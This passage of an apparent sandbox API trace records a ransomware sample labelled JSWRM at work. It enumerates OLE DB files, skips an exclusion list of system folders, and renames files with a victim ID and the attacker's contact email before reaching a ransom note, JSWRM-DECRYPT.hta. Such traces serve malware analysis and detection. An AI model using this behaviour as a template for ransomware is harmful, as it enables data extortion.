lpFileSize=0x345e890*=10049536280073920) returned 0 [0069.318] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.319] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.319] CloseHandle (hObject=0xffffffff) returned 1 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.320] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2=".") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="..") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="...") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="windows") returned -1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="recovery") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="perflogs") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="documents and settings") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="system volume information") returned -1 [0069.320] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="msocache") returned 1 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll.mui", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.rll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll.mui", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.rll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.321] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0069.321] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.321] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.322] CloseHandle (hObject=0xffffffff) returned 1 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.322] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb65d7300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2=".") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="..") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="...") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="windows") returned -1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="recovery") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="perflogs") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="documents and settings") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="system volume information") returned -1 [0069.323] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="msocache") returned 1 [0069.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.rll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.rll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.325] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0069.325] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.325] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.325] CloseHandle (hObject=0xffffffff) returned 1 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0069.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.325] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.326] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb65d7300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 0 [0069.326] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.326] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ff917db, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ff917db, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ff99e18, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.326] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.328] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2=".") returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="..") returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="...") returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="windows") returned -1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="recovery") returned -1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="perflogs") returned -1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="documents and settings") returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.328] lstrcmpiW (lpString1="msdaosp.dll", lpString2="system volume information") returned -1 [0069.328] lstrcmpiW 